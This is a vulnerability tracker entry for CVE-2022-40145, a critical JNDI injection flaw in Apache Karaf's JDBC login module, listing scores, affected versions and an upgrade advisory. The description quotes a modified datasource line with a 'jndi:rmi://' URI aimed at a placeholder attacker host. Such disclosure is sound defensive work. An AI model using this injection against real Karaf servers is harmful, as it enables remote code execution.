CVE-2022-40145

CRITICAL

Apache Karaf < 4.3.8 - Remote Code Execution via JNDI LDAP Data Source URI

Title source: llm

Description

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

References (1)

Core 1

Core References

Vendor Advisory vendor-advisory

https://karaf.apache.org/security/cve-2022-40145.txt

Scores

CVSS v3 9.8

EPSS 0.0539

EPSS Percentile 90.2%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment

Exploitation none

Automatable yes

Technical Impact total

Details

CWE

CWE-74 CWE-20

Status published

Products (2)

apache/karaf < 4.3.8

org.apache.karaf/apache-karaf 0 - 4.3.8Maven

Published Dec 21, 2022

Tracked Since Feb 18, 2026